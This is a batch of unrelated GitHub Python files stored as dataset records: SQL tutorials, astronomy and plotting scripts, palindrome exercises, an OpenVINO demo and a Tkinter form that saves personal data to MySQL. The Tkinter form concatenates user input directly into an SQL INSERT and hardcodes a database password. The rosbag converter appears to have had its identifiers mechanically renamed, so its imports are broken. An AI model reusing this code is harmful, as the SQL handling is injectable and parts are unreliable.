наличия во множестве (IN)\n\nSQL_IN = f\"\"\"SELECT ID , name , condition\n from task\n where ID IN (2 , 4)\"\"\"\n\ncur.execute(SQL_IN)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n# 9. Проверка на соответствие шаблону (LIKE)\nSQL_LIKE = f\"\"\"SELECT id, surname\n FROM students\n WHERE surname LIKE 'stud%'\"\"\"\n\ncur.execute(SQL_LIKE)\n\nrecords = cur.fetchall()\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n#10. Проверка на равенство NULL (is NULL)\nSQL_NULL = f\"\"\"SELECT id\n from task\n where ID IS NOT NULL\"\"\"\ncur.execute(SQL_NULL)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n#11. Сопоставление условия отбора (AND, OR и NOT)\n\nSQL_OR = f\"\"\"SELECT surname\n from students\n where id < 9\n or id < 3\"\"\"\ncur.execute(SQL_OR)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n#12. Сортировка результатов запроса (ORDER ВУ)\n\nSQL_ORDER_BY = f\"\"\"SELECT id_students , id_task\n\t FROM students_task\n\t order by id_task\"\"\"\n\ncur.execute(SQL_ORDER_BY)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n#13. Объединение результов нескольких запросов (UNION)\n\nSQL_UNION = f\"\"\"SELECT surname\n from students\n where id > 3\n union\n select name\n from task\n where id >5\"\"\"\ncur.execute(SQL_UNION)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n","repo_name":"EkaterinaKazennikova/python_autumn_work_2022","sub_path":"unit_two/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"776512427","text":"import argparse\n\nimport fastavro # noqa: F401\n\nimport lsst.alert.packet\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n # Default value based on LSE-81\n parser.add_argument('--visits-per-year', type=int, default=1056//10,\n help='Number of visits per year')\n parser.add_argument('--num-alerts', type=int, default=10,\n help='Number of simulated alert packets to generate')\n parser.add_argument('output_filename', type=str,\n help=\"File to which to write alerts\")\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n schema = lsst.alert.packet.Schema.from_file()\n arrayCount = {'prvDiaSources': args.visits_per_year,\n 'prvDiaForcedSources': args.visits_per_year//12,\n 'prvDiaNondetectionLimits': 0}\n alerts = [lsst.alert.packet.simulate_alert(schema.definition,\n keepNull=['ssObject'],\n arrayCount=arrayCount)\n for _ in range(args.num_alerts)]\n\n for alert in alerts:\n assert schema.validate(alert)\n\n with open(args.output_filename, \"wb\") as f:\n schema.store_alerts(f, alerts)\n\n with open(args.output_filename, \"rb\") as f:\n writer_schema, loaded_alerts = schema.retrieve_alerts(f)\n\n assert schema == writer_schema\n for a1, a2 in zip(alerts, loaded_alerts):\n assert a1 == a2\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lsst/alert_packet","sub_path":"python/lsst/alert/packet/bin/simulateAlerts.py","file_name":"simulateAlerts.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"15391543288","text":"'''\nAuthor: matiastang\nDate: 2022-08-03 16:20:10\nLastEditors: matiastang\nLastEditTime: 2022-08-03 16:41:49\nFilePath: /matias-AI/md/非线性回归/test.py\nDescription: 一元多项式\n'''\n#!/usr/bin/python3\n#coding=utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n # 定义0-1之间的等距的10个点\n x = np.linspace(0, 1, 10)\n w = 1.1\n b = 0.2\n y = w * x + b\n line1 = plt.plot(x, y, marker='.')\n\n x2 = x * x\n w2 = -0.5\n y2 = w * x + w2 * x2 + b\n line2 = plt.plot(x, y2, marker='s')\n\n x3 = x * x * x\n w3 = 2.3\n y3 = w * x + w2 * x2 + w3 * x3 + b\n line3 = plt.plot(x, y3, marker='x')\n\n plt.grid()\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n plt.title(\"linear and non-linear\")\n plt.legend([line1,line2,line3], [\"x\",\"x*x\",\"x*x*x\"])\n plt.show()","repo_name":"matiastang/matias-AI","sub_path":"md/非线性回归/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22817810153","text":"from pyverless import ServerlessFramework, Provider, Function, Constants, RegionalParam, StageRegionParam\n\nsls = ServerlessFramework(\n framework_version=\"2.70.0\",\n service=\"ras\",\n provider=Provider(\n name='aws',\n runtime='python3.8',\n lambda_hashing_version='20201221',\n )\n)\n\nregional_timeout = RegionalParam(\n sls_framework=sls,\n name=\"api_timeout\",\n mapping={\n \"us-east-1\": 10,\n \"us-east-2\": 20\n },\n default=30\n)\n\nstage_region_name = StageRegionParam(\n sls_framework=sls,\n name=\"memory_size\",\n mapping={\n (\"dev\", \"us-east-1\"): 128,\n (\"prod\", \"us-east-1\"): 1024,\n (\"prod\", \"eu-west-1\"): 512,\n },\n default=256\n)\n\nFunction(\n sls,\n \"api\",\n handler=\"api.handler\",\n timeout=regional_timeout.key,\n memory_size=stage_region_name.key,\n environment={\n \"AWS_REGION\": Constants.REGION,\n \"STAGE\": Constants.STAGE,\n }\n)\n","repo_name":"Om3rr/pyverless","sub_path":"examples/regional/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25567062783","text":"import json\nimport logging\nimport os\nimport sys\nfrom os import path\n\n\nwith open('config.json') as file:\n config = json.load(file)\n\n\n# Plot options setup\nDEFAULT_OPTIONS = config['default_options']\n\ndef default_options():\n \"\"\"\n Return a 2nd level deep copy of DEFAULT_OPTIONS.\n \"\"\"\n return {k: v.copy() if 'copy' in dir(v) else v for k, v in DEFAULT_OPTIONS.items()}\n\n\n# Terminal setup\nterm_options = config['term_options']\n\navailable_terms = {\n 'eps': 'postscript eps color {}'.format(term_options['eps']),\n 'gp': 'gp',\n 'png': 'pngcairo {}'.format(term_options['png']),\n 'qt': 'qt {}'.format(term_options['qt']),\n 'wxt': 'wxt',\n 'x': 'x11'\n}\n\ntry:\n term = sys.argv[1].lstrip('-')\nexcept IndexError:\n term = 'eps'\n\nif term not in available_terms:\n print(__doc__.format(fig_x=sys.argv[0]).strip(), file=sys.stderr)\n exit(2)\n\nDEFAULT_OPTIONS['terminal'] = available_terms[term]\nif term in ('wxt', 'x'):\n DEFAULT_OPTIONS['wait'] = True\n\n\ndef output(curves, options, filename=None, *args):\n \"\"\"\n Generate output file from curves.\n\n :curves: list of curves for the gnuplotlib plot function\n :options: options dictionary for the gnuplotlib plot function\n :filename: output file name as a (format) string *without* the extension\n :args: substitutions to be made in 'filename'\n \"\"\"\n if logger.level >= logging.INFO: print(flush=True)\n if term in ('eps', 'gp', 'png'):\n filename = filename.format(*args)\n options['output'] = filename + '.' + term\n data_file = filename + '.data'\n\n if logger.level == logging.DEBUG:\n # Save plotted data to file.\n curves = [curve if len(curve) == 3 else curve + ({},) for curve in curves]\n header = \"\\t\".join(\"x\\t\" + str(opt.get('legend', 'unlabeled')) for x, y, opt in curves)\n matrix = [row.astype(np.float64) for x, y, opt in curves for row in (x, y)]\n maxlen = max(len(row) for row in matrix)\n matrix = [np.concatenate([row, np.full(maxlen - len(row), np.nan)]) for row in matrix]\n matrix = np.array(matrix).transpose()\n logger.info(\"Generating data file %s\", options['output'])\n np.savetxt(data_file, matrix, fmt=\"%.3e\", delimiter=\"\\t\", header=header)\n\n logger.info(\"Generating file %s\", options['output'])\n gp.gnuplotlib(**options).plot(*curves)\n\n\ndef name(filename):\n return path.splitext(path.basename(filename))[0]\n\n\n# Text\ntitle = config['title']\nlabel = config['label']\nPLOT_LETTER = label['PLOT_LETTER']\n\n# Gnuplot point types\nPOINT_SQUARE = 5\nPOINT_BALL = 7\nPOINT_TRIANGLE = 9\nPOINT_INVTRIANGLE = 11\nPOINT_DIAMOND = 13\n\n# Modules used by figures\nimport math\nimport multiprocessing\nimport numpy as np\nimport sympy as sym\nimport gnuplotlib as gp\nfrom multiprocessing import pool\n\nimport utils\n\nlogging.basicConfig(format='[%(levelname)s] %(message)s', level=logging.INFO)\nlogger = logging.getLogger()\n\nif logger.level == logging.DEBUG:\n DEFAULT_OPTIONS['with'] = 'linespoints '\n","repo_name":"amphybio/stochastic-gene-expression","sub_path":"entropy2020/src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37808921904","text":"class Solution:\n def isPalindrome(self, x: int) -> bool:\n if x < 0:\n return False\n temp_num = x\n regx = 0\n flag = len(str(x)) % 2 # 判断这个数是否是奇数位数,奇数位数时处理略有不同\n round_num = len(str(x)) // 2\n while round_num > 0:\n regx = regx * 10 + (temp_num % 10) # 将x的后半部分逆序输出为regx\n temp_num //= 10 # 去掉最后一位\n round_num -= 1\n if flag:\n temp_num //= 10\n return temp_num == regx\n\n\nif __name__ == '__main__':\n sol = Solution()\n sol.isPalindrome(123467321)\n","repo_name":"hubing1791/my_leetcode","sub_path":"leetcode_main/easy/9_easy_palindrome_number/palin_num_reversehalf.py","file_name":"palin_num_reversehalf.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17306890695","text":"from typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n from entharion.trace import Trace\n\nfrom entharion.instruction import Instruction\nfrom entharion.logging import log\nfrom entharion.stack import Stack\n\n\nclass Memory:\n def __init__(self, data: bytes, trace: \"Trace\") -> None:\n self.stack = Stack()\n\n self.data: bytes = data\n self.trace: \"Trace\" = trace\n\n self.version: int = self.read_byte(0x00)\n\n self.dynamic: int = 0\n self.static: int = self.read_word(0x0E)\n self.high: int = self.read_word(0x04)\n\n self.routine_offset: int = self.read_word(0x28)\n self.strings_offset: int = self.read_word(0x2A)\n\n self.global_table_start: int = self.read_word(0x0C)\n\n self.pc: int\n\n self._memory_checks()\n self._read_starting_address()\n\n self.details()\n\n def details(self) -> None:\n log(f\"Zcode version: {self.version}\")\n log(f\"Static memory start: {hex(self.static)}\")\n log(f\"High memory start: {hex(self.high)}\")\n log(f\"Routine offset: {self.routine_offset}\")\n log(f\"Strings offset: {self.strings_offset}\")\n log(f\"Global table start: {hex(self.global_table_start)}\")\n log(f\"Starting address: {hex(self.pc)}\")\n log(\"----------------------------------------------\\n\")\n\n def read_instruction(self, address: int) -> Instruction:\n instruction = Instruction(self, address)\n instruction.decode()\n\n return instruction\n\n def read_byte(self, address: int) -> int:\n return self.data[address]\n\n def read_word(self, address: int) -> int:\n return (self.data[address] << 8) | self.data[address + 1]\n\n def read_packed(self, address: int, is_routine: bool) -> int:\n if self.version < 4:\n return 2 * address\n\n if self.version < 6:\n return 4 * address\n\n if self.version < 8 and is_routine:\n return 4 * address + (8 * self.routine_offset)\n\n if self.version < 8:\n return 4 * address + (8 * self.strings_offset)\n\n return 8 * address\n\n def _read_starting_address(self) -> None:\n if self.version != 6:\n self.pc = self.read_word(0x06)\n else:\n self.pc = self.read_packed(self.read_word(0x06), True)\n\n def _memory_checks(self) -> None:\n header_size: int = 64\n\n # There is a minimum size to a zcode program in that it must be able\n # to accommodate a 64 byte header.\n\n if len(self.data) < header_size:\n raise RuntimeError(\"dynamic memory is below required 64 bytes\")\n\n # The specification indicates that dynamic memory must contain at\n # least 64 bytes to accommodate the header.\n\n if self.static < header_size:\n raise RuntimeError(\"static memory begins before byte 64\")\n\n # The specification indicates that the total of dynamic plus static\n # memory must not exceed 64K minus 2 bytes.\n\n dynamic_size: int = self.static - 1 - self.dynamic + 1\n\n if (dynamic_size + self.static) > 65534:\n raise RuntimeError(\"memory exceeds addressable memory space\")\n","repo_name":"jeffnyman/entharion","sub_path":"src/entharion/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70686686187","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\n代码功能:\n给你一个正整数n, 编程求所有这样的五位和六位十进制回文数,\n满足各位数字之和等于n(5<=n<=54)。\n按从小到大的顺序输出满足条件的整数。\n\"\"\"\n\n\ndef pldr(min_digit, max_digit):\n\n \"\"\" 返回一个包含要求位数回文数的list \"\"\"\n\n pal_clcts = []\n for num in range(10**(min_digit - 1), 10**max_digit):\n xstr = str(num)\n if xstr == xstr[::-1]:\n pal_clcts.append(num)\n return pal_clcts\n\ndef pldr_output(number):\n\n \"\"\" 在屏幕上打印出各位数字之和为要求数值的所有5至6位回文数 \"\"\"\n\n pldr_use = pldr(5, 6)\n matched_num = 0\n for num in pldr_use:\n if sum(int(i) for i in str(num)) == number:\n print(num)\n matched_num += 1\n if matched_num == 0:\n print('无匹配项')\n\ndef func():\n\n \"\"\" 主函数 \"\"\"\n\n num_request = int(input('n = '))\n pldr_output(num_request)\n\n\nif __name__ == '__main__':\n func()\n","repo_name":"crispding/gitskills","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6927396421","text":"for _ in range(int(input())):\n n=int(input())\n s=int(input())\n\n if len(str(int('1'*(n+1))-s)) > n:\n print(int('9'*n)-s)\n else:\n print(int('1'*(n+1))-s)\n\n# can also be written as\n# print (int('1'*(l+1) if n[0]=='9' else '9'*l)-int(n))","repo_name":"Raffian-moin/Codeforces-solutions","sub_path":"codeforces/1000/palindromic_number.py","file_name":"palindromic_number.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18914840729","text":"import cv2\r\nimport numpy as np\r\n\r\nfrom openvino.inference_engine import IENetwork, IECore\r\n\r\ndef main():\r\n\r\n ie = IECore()\r\n\r\n model='deeplabv3' # in='mul_1/placeholder_port_1'(1,3,513,513), out='ArgMax/Squeeze'(1,513,513)\r\n model = './public/'+model+'/FP16/'+model\r\n net = ie.read_network(model+'.xml', model+'.bin')\r\n exec_net = ie.load_network(net, 'CPU')\r\n\r\n #cap = cv2.VideoCapture('movie1.264')\r\n cap = cv2.VideoCapture(0)\r\n\r\n bg = cv2.imread('background.jpg')\r\n ret, img = cap.read()\r\n bg = cv2.resize(bg, (img.shape[1], img.shape[0]))\r\n\r\n key = -1\r\n while key!=27:\r\n ret, img = cap.read()\r\n if ret==False:\r\n return 0\r\n cv2.imshow('input', img)\r\n\r\n blob = cv2.resize(img, (513, 513))\r\n blob = blob.transpose((2,0,1))\r\n blob = blob.reshape((1,3,513,513))\r\n\r\n res = exec_net.infer(inputs={'mul_1/placeholder_port_1': blob}) ['ArgMax/Squeeze'][0]\r\n\r\n clsId = 15 # PascalVOC class 0=BG, 15=Person\r\n mask = np.where(res==clsId, 255, 0).astype(np.uint8)\r\n mask = cv2.resize(mask, (img.shape[1], img.shape[0]))\r\n mask_p = np.reshape(mask, (img.shape[0], img.shape[1], 1))\r\n mask_n = 255-mask_p\r\n\r\n img = img & mask_p\r\n bg_tmp = bg & mask_n\r\n img = img | bg_tmp \r\n\r\n cv2.imshow('Result', img)\r\n key = cv2.waitKey(1)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"yas-sim/openvino-semantic-segmentation-demos","sub_path":"background_swap.py","file_name":"background_swap.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"42796437461","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 27 11:34:22 2021\r\n\r\n@author: naika\r\n\"\"\"\r\n\r\nimport random\r\n\r\ndef pick_name(num_options=1):\r\n nameFile = open(\"./namefile.txt\", \"r\", encoding=\"utf8\")\r\n names = nameFile.read().split()\r\n nameFile.close()\r\n \r\n options = []\r\n \r\n for _ in range(num_options):\r\n options.append(random.choice(names))\r\n \r\n return options\r\n \r\ndef pick_townname(num_options=1):\r\n affixes = ['', 'port', 'clare', 'ley', 'view', 'folk', 'sex', 'karta', 'grad',\r\n 'hampton', 'stead', 'stedt', 'stätt', 'dorf', 'wych', 'wick', \r\n 'wyke', 'wich', 'thorpe', 'thorp', 'ceter', 'ham', 'cester', 'stadt',\r\n 'caster', 'by', 'dale', 'field', 'ford', 'town', 'bury', 'chester', \r\n 'ton', 'burgh', 'burg', 'ville']\r\n \r\n bases = pick_name(num_options)\r\n towns = []\r\n for base in bases:\r\n towns.append(base + random.choice(affixes))\r\n \r\n return towns","repo_name":"MaxfieldEngland/friendtron","sub_path":"namegen.py","file_name":"namegen.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70934522349","text":"import numpy as np\nimport rosbag\nfrom std_msgs.msg import *\n# from dvs_msgs.msg import CamBased, CamBasedArray\nfrom prophesee_CamBased_msgs.msg import CamBased, CamBasedArray\nfrom tqdm import tqdm\n\n\ndef e2npy(config, fn=\"CamBaseds.npy\"):\n bag = rosbag.Bag(config[\"bag_path\"], \"r\")\n eva_msgs = []\n for m in tqdm(bag.read_messages(config[\"CamBased_topic\"])):\n eva_msgs.append(m.message)\n # eva_msgs = [m.message for m in bag.read_messages(config[\"CamBased_topic\"])]\n CamBased_array = []\n for ea in eva_msgs:\n for e in ea.CamBaseds:\n CamBased_array.append(e)\n\n CamBased_np = np.zeros([len(CamBased_array), 4])\n\n for i in range(len(CamBased_array)):\n CamBased_np[i, 0] = CamBased_array[i].ts.secs+CamBased_array[i].ts.nsecs/1e9\n CamBased_np[i, 1] = CamBased_array[i].x\n CamBased_np[i, 2] = CamBased_array[i].y\n CamBased_np[i, 3] = 1 if CamBased_array[i].polarity else 0\n CamBased_np = CamBased_np[CamBased_np[:, 0].argsort()]\n np.save(fn, CamBased_np)\n\n\nif __name__ == \"__main__\":\n config = {}\n config[\"bag_path\"] = \"/home/mpl/datasets/nfov_day_loopychessboard_filter.bag\"\n config[\"CamBased_topic\"] = \"/prophesee/camera/cd_CamBaseds_buffer\"\n e2npy(config)\n","repo_name":"zyfff/Canny-EVT","sub_path":"scripts/e2npy.py","file_name":"e2npy.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"517713000","text":"import tkinter\nimport tkinter.messagebox\nfrom PIL import ImageTk,Image\n\nt=tkinter.Tk()\n\n\n\n\n\nt.title('DATA BASE')\n\nt.geometry('1000x600')\n\nz=Image.open(\"D:\\\\Relin.m\\\\PY PROJECTS\\\\project\\\\relin.png\")\nz=z.resize((1000,600))\nz=ImageTk.PhotoImage(z)\n\npic=tkinter.Label(t,image=z)\npic.place(x=0,y=0)\n\na=tkinter.Label(text=\"PERSONAL DATA BASE\",bg=\"White\",fg=\"Black\",font=(\"Lucida Bright\",36,'bold'))\na.place(x=190,y=10)\n\n\n\nb=tkinter.Label(text=\" 1) First Name -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nb.place(x=0,y=100)\n\nc=tkinter.Entry(width=30)\nc.place(x=180,y=110)\n\n\nd=tkinter.Label(text=\" 2) Last Name -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nd.place(x=0,y=150)\n\ne=tkinter.Entry(width=30)\ne.place(x=180,y=160)\n\nf=tkinter.Label(text=\" 3) Age -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nf.place(x=0,y=200)\n\ng=tkinter.Entry(width=30)\ng.place(x=180,y=210)\n\nh=tkinter.Label(text=\" 4) Email ID -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nh.place(x=0,y=250)\n\ni=tkinter.Entry(width=30)\ni.place(x=180,y=260)\n\nj=tkinter.Label(text=\" 5) Phone Number -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nj.place(x=0,y=300)\n\nk=tkinter.Entry(width=30)\nk.place(x=180,y=310)\n\nl=tkinter.Label(text=\" 6) Gender -\",bg=\"white\",fg=\"black\",font=(\"Calibri\",15,))\nl.place(x=0,y=350)\n\nm=tkinter.Entry(width=30)\nm.place(x=180,y=360)\n\nn=tkinter.Label(text=\" 7) Location -\",bg=\"white\",fg=\"black\",font=(\"Calibri\",15,))\nn.place(x=0,y=400)\n\no=tkinter.Entry(width=30)\no.place(x=180,y=410)\n\n\ndef fun():\n firstname=c.get()\n lastname=e.get()\n age=g.get()\n emailid=i.get()\n phonenumber=k.get()\n gender=m.get()\n location=o.get()\n\n if(firstname==\"\"or lastname==\"\" or age==\"\" or emailid==\"\" or phonenumber==\"\" or gender==\"\" or location==\"\"):\n tkinter.messagebox.showerror(\"Error Message\",\"Please Complete Fields\")\n\n else:\n import pymysql\n \n x=pymysql.connect(host =\"localhost\", user = \"root\", password = \"relin\", db = \"project\" )\n cur=x.cursor()\n cur.execute(\"insert into data values('\"+firstname+\"','\"+lastname+\"','\"+age+\"','\"+emailid+\"','\"+phonenumber+\"','\"+gender+\"','\"+location+\"')\")\n x.commit()\n x.close()\n \n tkinter.messagebox.askyesno(\"Save\",\"Do You Want to Save\")\n tkinter.messagebox.showinfo(\"Thank You\",\"Thanks For Visiting\")\n t.destroy()\n \np=tkinter.Button(text=\"Submit\",fg=\"black\",font=(\"Calibri\",15),command=fun)\np.place(x=500,y=500)\n\n\n\n\n\n\n\n\nt.mainloop()\n","repo_name":"relinmathew/Personal-Database","sub_path":"DATABASES.py","file_name":"DATABASES.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15470503018","text":"from services import CalculateGaussianScoreService\n\n\nclass CalculateWeightedKNNService:\n\n def __init__(self, data, vec1, k=5, score_func=CalculateGaussianScoreService):\n self.data = data\n self.vec1 = vec1\n self.k = k\n self.score_func = score_func\n\n\n def call(self):\n # Get distances\n dlist = self._get_distances()\n\n avg = 0.0\n total_weight = 0.0\n\n # Get weighted average\n for i in range(self.k):\n dist = dlist[i][0]\n idx = dlist[i][1]\n\n weight = self.score_func(dist).call()\n avg += weight * self.data[idx]['result']\n total_weight += weight\n\n if total_weight == 0:\n return 0\n avg /= total_weight\n return avg\n\n def _get_distances(self):\n distance_list = []\n\n # Loop over every item in the dataset\n for i in range(len(self.data)):\n vec2 = self.data[i]['input']\n\n # Add the distance and the index\n distance_list.append((self.score_func(self.vec1, vec2).call(), i))\n\n # Sort by distance\n distance_list.sort()\n return distance_list\n","repo_name":"andreffs18/collective-intelligence","sub_path":"chapter8/services/calculate_weighted_knn_service.py","file_name":"calculate_weighted_knn_service.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"31531034874","text":"# Author: Hanzi Mao \n#\n# License: BSD 3 clause\n\nfrom ..utils import select_area, get_lat_lon, match_lat_lon, get_out_path\n\nimport os\nimport numpy.ma as ma\nimport numpy as np\nfrom netCDF4 import Dataset\n\n\ndef merge_sentinel_smap_p_e(doy, lat1, lat2, lon1, lon2, area_name, verbose=True):\n # merge to check the match between sentinel and smap_e\n fh_dic = dict()\n fh_dic[\"sentinel\"] = Dataset(os.path.join(\"Data\", \"Sentinel\", \"usa\", doy + \".nc\"), \"r\")\n fh_dic[\"smap_p_e\"] = Dataset(os.path.join(\"Data\", \"SMAP_P_E\", \"usa_3km_match_sentinel\", doy + \".nc\"), \"r\")\n\n out_path = get_out_path(os.path.join(\"Data\", \"Merge_Sentinel_SMAP_Passive\", area_name))\n fh_out = Dataset(os.path.join(out_path, doy + \".nc\"), \"w\")\n\n lat_indices, lon_indices = select_area(lat1, lat2, lon1, lon2, \"M03\")\n lats, lons = get_lat_lon(\"M03\")\n assert (len(lats) != 0 and len(lons) != 0)\n lats = lats[lat_indices[0]: lat_indices[1]]\n lons = lons[lon_indices[0]: lon_indices[1]]\n\n i_lat_start, i_lat_end, i_lon_start, i_lon_end = match_lat_lon(fh_dic[\"sentinel\"].variables[\"lat\"][:],\n fh_dic[\"sentinel\"].variables[\"lon\"][:],\n lats,\n lons)\n\n fh_out.createDimension('lat', len(lats))\n fh_out.createDimension('lon', len(lons))\n\n outVar = fh_out.createVariable('lat', 'f4', ('lat'))\n outVar.setncatts({\"units\": \"degree_north\"})\n outVar[:] = lats[:]\n outVar = fh_out.createVariable('lon', 'f4', ('lon'))\n outVar.setncatts({\"units\": \"degree_east\"})\n outVar[:] = lons[:]\n\n rename_dic = {\"soil_moisture\": \"smap_p_e_soil_moisture\",\n \"tb_v_corrected\": \"smap_p_e_tb_v_corrected\"}\n ma_dic = {}\n for fName in fh_dic:\n for v_name, varin in fh_dic[fName].variables.items():\n if v_name in [\"soil_moisture\", \"tb_v_corrected\", \"tb_v_disaggregated\"]:\n if fName == \"smap_p_e\":\n v_name = rename_dic[v_name]\n outVar = fh_out.createVariable(v_name, varin.datatype, varin.dimensions)\n outVar.setncatts({k: varin.getncattr(k) for k in varin.ncattrs()})\n outVar[:] = varin[i_lat_start: i_lat_end + 1, i_lon_start: i_lon_end + 1]\n ma_dic[v_name] = ma.getmaskarray(varin[i_lat_start: i_lat_end + 1, i_lon_start: i_lon_end + 1])\n\n daily_mask = np.logical_or.reduce(list(ma_dic.values()))\n if verbose:\n print(\"Before mask, number of valid grids:\", fh_out.variables[\"soil_moisture\"][:].count())\n for var in fh_out.variables:\n if var != \"lat\" and var != \"lon\":\n if ma.is_masked(fh_out.variables[var][:]):\n print(var, ma.array(fh_out.variables[\"soil_moisture\"][:], mask=\n ma.mask_or(ma.getmaskarray(fh_out.variables[\"soil_moisture\"][:]),\n ma.getmaskarray(fh_out.variables[var][:]))).count())\n for var in fh_out.variables:\n if var != \"lat\" and var != \"lon\":\n fh_out.variables[var][:] = ma.array(fh_out.variables[var][:], mask=daily_mask)\n if verbose:\n print(\"After mask, number of valid grids:\", fh_out.variables[\"soil_moisture\"][:].count())","repo_name":"HannaMao/Gap-Filling-of-Soil-Moisture","sub_path":"data_preprocessing/merge/merge_sentinel_smap_p_e.py","file_name":"merge_sentinel_smap_p_e.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"23366255579","text":"import random\n\n\"\"\"\nSeed words for propagating polarity scores.\n\"\"\"\n\n# From Turney and Littman (2003), probably not ideal for historical data\nPOSITIVE_TURNEY = [\n \"good\",\n \"nice\",\n \"excellent\",\n \"positive\",\n \"fortunate\",\n \"correct\",\n \"superior\",\n]\nNEGATIVE_TURNEY = [\n \"bad\",\n \"terrible\",\n \"poor\",\n \"negative\",\n \"unfortunate\",\n \"wrong\",\n \"inferior\",\n]\n\nPOSITIVE_FINANCE = [\n \"successful\",\n \"excellent\",\n \"profit\",\n \"beneficial\",\n \"improving\",\n \"improved\",\n \"success\",\n \"gains\",\n \"positive\",\n]\nNEGATIVE_FINANCE = [\n \"negligent\",\n \"loss\",\n \"volatile\",\n \"wrong\",\n \"losses\",\n \"damages\",\n \"bad\",\n \"litigation\",\n \"failure\",\n \"down\",\n \"negative\",\n]\n\n# POSITIVE_TWEET = [\"love\", \"awesome\", \"nice\", \"amazing\", \"best\", \"fantastic\", \"correct\"]\n# NEGATIVE_TWEET = [\"hate\", \"terrible\", \"nasty\", \"awful\", \"worst\", \"horrible\", \"wrong\"]\n\nPOSITIVE_TWEET = [\n \"love\",\n \"loved\",\n \"loves\",\n \"awesome\",\n \"nice\",\n \"amazing\",\n \"best\",\n \"fantastic\",\n \"correct\",\n \"happy\",\n]\nNEGATIVE_TWEET = [\n \"hate\",\n \"hated\",\n \"hates\",\n \"terrible\",\n \"nasty\",\n \"awful\",\n \"worst\",\n \"horrible\",\n \"wrong\",\n \"sad\",\n]\n\nMALE = [\n \"man\",\n \"male\",\n \"boy\",\n \"gentleman\",\n \"mr\",\n \"masculine\",\n \"dad\",\n \"father\",\n \"brother\",\n \"son\",\n \"guy\",\n]\n\nFEMALE = [\n \"female\",\n \"woman\",\n \"girl\",\n \"lady\",\n \"chick\",\n \"mom\",\n \"sister\",\n \"mother\",\n \"feminine\",\n \"daughter\",\n \"ms\",\n \"mrs\",\n \"miss\"\n]\n\nPOSITIVE_HIST = [\n \"good\",\n \"lovely\",\n \"excellent\",\n \"fortunate\",\n \"pleasant\",\n \"delightful\",\n \"perfect\",\n \"loved\",\n \"love\",\n \"happy\",\n \"freedom\", \"glorious\", \"glory\", \"perfect\", \"perfectly\", \"paradise\", \"reign\", \"help\", \"recovered\", \"recover\", \"helped\", \"free\", \"freed\", \"liberate\", \"liberated\", \"save\", \"saved\", \"intervened\", \"support\", \"resolve\", \"resolved\", \"geurrilla\", \"leader\", \"safe\", \"safety\",\n]\nNEGATIVE_HIST = [\n \"bad\",\n \"horrible\",\n \"poor\", \"unfortunate\",\n \"unpleasant\",\n \"disgusting\",\n \"evil\",\n \"hated\",\n \"hate\",\n \"unhappy\",\n \"enslaved\", \"murder\", \"murdered\", \"terror\", \"terrorist\", \"terrorism\", \"murderer\", \"brutal\", \"brutalizing\", 